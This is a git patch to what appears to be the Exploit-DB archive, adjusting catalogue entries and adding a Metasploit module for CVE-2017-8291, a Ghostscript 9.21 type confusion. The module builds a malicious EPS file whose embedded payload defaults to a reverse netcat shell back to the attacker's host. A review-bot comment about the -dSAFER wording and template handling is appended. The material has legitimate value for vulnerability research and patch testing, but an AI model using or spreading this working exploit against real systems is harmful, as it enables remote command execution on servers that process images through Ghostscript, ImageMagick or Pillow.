From 6515e2635658f5584d0ed7e4e4f224813a3700fa Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 3 May 2017 05:01:17 +0000
Subject: [PATCH] DB: 2017-05-03
1 new exploits
MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow
MySQL < 5.6.35 / < 5.7.17 - Integer Overflow
Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)
Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection
Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection
---
 files.csv | 5 ++-
 platforms/linux/local/41955.rb | 75 ++++++++++++++++++++++++++++++++++
 2 files changed, 78 insertions(+), 2 deletions(-)
 create mode 100755 platforms/linux/local/41955.rb
diff --git a/files.csv b/files.csv
index 49ccb4119..21ff47538 100644
--- a/files.csv
+++ b/files.csv
@@ -5481,7 +5481,7 @@ id,file,description,date,author,platform,type,port
 41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0
 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0
 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0
-41954,platforms/multiple/dos/41954.py,"MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
+41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -8966,6 +8966,7 @@ id,file,description,date,author,platform,type,port
 41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0
 41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0
 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
+41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37803,4 +37804,4 @@ id,file,description,date,author,platform,type,port
 41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0
 41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0
 41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0
-41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
+41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0
diff --git a/platforms/linux/local/41955.rb b/platforms/linux/local/41955.rb
new file mode 100755
index 000000000..98c0412a8
--- /dev/null
+++ b/platforms/linux/local/41955.rb
@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::FILEFORMAT
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution',
+ 'Description' => %q{
+ This module exploits a type confusion vulnerability in Ghostscript that can
+ be exploited to obtain arbitrary command execution. This vulnerability affects
+ Ghostscript version 9.21 and earlier and can be exploited through libraries
+ such as ImageMagick and Pillow.
+ },
+ 'Author' => [
+ 'Atlassian Security Team', # Vulnerability discovery
+ 'hdm' # Metasploit module
+ ],
+ 'References' => [
+ %w{CVE 2017-8291},
+ %w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
+ %w{URL http://seclists.org/oss-sec/2017/q2/148},
+ %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
+ %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
+ ],
+ 'DisclosureDate' => 'Apr 27 2017',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => false,
+ 'Payload' => {
+ 'BadChars' => "\x22\x27\x5c)(", # ", ', \, (, and )
+ 'Compat' => {
+ 'PayloadType' => 'cmd cmd_bash',
+ 'RequiredCmd' => 'generic netcat bash-tcp'
+ }
+ },
+ 'Targets' => [
+ ['EPS file', template: 'msf.eps']
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/reverse_netcat',
+ 'LHOST' => Rex::Socket.source_address,
+ 'DisablePayloadHandler' => false,
+ 'WfsDelay' => 9001
+ }
+ ))
+
+ register_options([
+ OptString.new('FILENAME', [true, 'Output file', 'msf.eps'])
+ ])
+ end
+
+ # Example usage from the bug tracker:
+ # $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps
+
+ def exploit
+ file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded))
+ end
+
+ def template
+ ::File.read(File.join(
+ Msf::Config.data_directory, 'exploits', 'CVE-2017-8291',
+ target[:template]
+ ))
+ end
+
+end
\ No newline at end of file
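Review bot: The usage comment above `def exploit` reproduces the bug-tracker invocation with `-dSAFER` set, yet neither it nor the `'Description'` text states that this flag does not prevent the type confusion, which is the first thing a reader assessing a hardened Ghostscript deployment will want to know. I would extend the `'Description'` heredoc with a sentence such as `Running Ghostscript with -dSAFER does not prevent this issue; see the ghostpdl commits under References for the upstream change.` so the prose matches the referenced commits (which their listing suggests are the fix) instead of implying a configuration-only workaround. Separately, `template.sub('echo vulnerable > /dev/tty', payload.encoded)` replaces only the first occurrence and returns the template unchanged when the marker string is absent, so a stale or edited `msf.eps` under `exploits/CVE-2017-8291` would be written out silently with no error; a presence check on the marker before `file_create` would turn that into a visible module failure. The file is also committed without a trailing newline (`\ No newline at end of file`), which is worth fixing for an archived source file.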